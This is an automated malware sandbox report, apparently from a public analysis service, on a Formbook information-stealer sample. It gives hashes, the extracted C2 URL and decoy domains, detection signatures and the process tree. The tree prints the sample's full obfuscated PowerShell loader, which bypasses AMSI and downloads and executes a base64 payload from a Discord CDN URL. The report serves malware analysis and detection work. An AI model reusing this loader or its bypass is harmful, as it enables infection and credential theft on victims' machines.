Overview

overview

10

Static

static

51c392870e...in.exe

windows7_x64

10

51c392870e...in.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    195s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    26-07-2021 17:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe

  • Size

    65KB

  • MD5

    06daa4f472383226392964c70e34c376

  • SHA1

    b47a3554b0bf7250caa0f84090fb387cb332f31b

  • SHA256

    51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541

  • SHA512

    9f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee

Score
10/10
formbookratspywarestealersuricatatrojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.howmucharemyrarecoinsworth.com/jn7g/

Decoy

mojketering.com

signinsimple.com

theartclouds.com

xmartmanagement.com

akademisantri.com

knitsu.com

funeralhomeswarrensburgil.com

formatohd.xyz

ortetiles.com

myeduhubs.com

twinpiques.com

itpaystobefashionable.com

3drinkminimum.com

wanpoo1.com

crystalclearlifecoachingcc.com

dronerealestate.net

langers.email

konstela.com

enteratecondanielvelasquez.com

graceinhomeschoolchaos.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • suricata: ET MALWARE FormBook CnC Checkin (GET)
    suricata
  • Formbook Payload 3 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Users\Admin\AppData\Local\Temp\51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe
      "C:\Users\Admin\AppData\Local\Temp\51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541.64.exe.bin.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
        Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$76545677866555677886556778657=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,56,49,51,54,56,53,52,48,48,51,55,50,50,47,109,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\WINDOWS\syswow64\calc.exe
          "{path}"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:292
    • C:\Windows\SysWOW64\autofmt.exe
      "C:\Windows\SysWOW64\autofmt.exe"
      2⤵
        PID:1628
      • C:\Windows\SysWOW64\wlanext.exe
        "C:\Windows\SysWOW64\wlanext.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1348
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:1812

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/292-72-0x0000000000400000-0x000000000042E000-memory.dmp
        Filesize

        184KB

        Download
      • memory/292-74-0x0000000000AA0000-0x0000000000DA3000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/292-75-0x0000000000190000-0x00000000001A4000-memory.dmp
        Filesize

        80KB

        Download
      • memory/292-73-0x000000000041EBD0-mapping.dmp
        Download
      • memory/1268-83-0x0000000004270000-0x0000000004357000-memory.dmp
        Filesize

        924KB

        Download
      • memory/1268-76-0x0000000006C20000-0x0000000006D96000-memory.dmp
        Filesize

        1.5MB

        Download
      • memory/1348-79-0x0000000000080000-0x00000000000AE000-memory.dmp
        Filesize

        184KB

        Download
      • memory/1348-77-0x0000000000000000-mapping.dmp
        Download
      • memory/1348-82-0x0000000001E50000-0x0000000001EE3000-memory.dmp
        Filesize

        588KB

        Download
      • memory/1348-80-0x0000000001FE0000-0x00000000022E3000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/1348-78-0x00000000004C0000-0x00000000004D6000-memory.dmp
        Filesize

        88KB

        Download
      • memory/1812-81-0x0000000000000000-mapping.dmp
        Download
      • memory/2012-71-0x000000001B8B0000-0x000000001B90A000-memory.dmp
        Filesize

        360KB

        Download
      • memory/2012-65-0x000000001AB70000-0x000000001AB72000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2012-64-0x000000001AA70000-0x000000001AA71000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2012-63-0x000000001ABF0000-0x000000001ABF1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2012-62-0x0000000002620000-0x0000000002621000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2012-66-0x000000001AB74000-0x000000001AB76000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2012-60-0x0000000000000000-mapping.dmp
        Download
      • memory/2012-67-0x00000000026D0000-0x00000000026D1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2012-70-0x000000001AB7A000-0x000000001AB99000-memory.dmp
        Filesize

        124KB

        Download
      • memory/2012-69-0x000000001B4A0000-0x000000001B4A1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2012-68-0x000000001AAA0000-0x000000001AAA1000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2012-61-0x000007FEFB891000-0x000007FEFB893000-memory.dmp
        Filesize

        8KB

        Download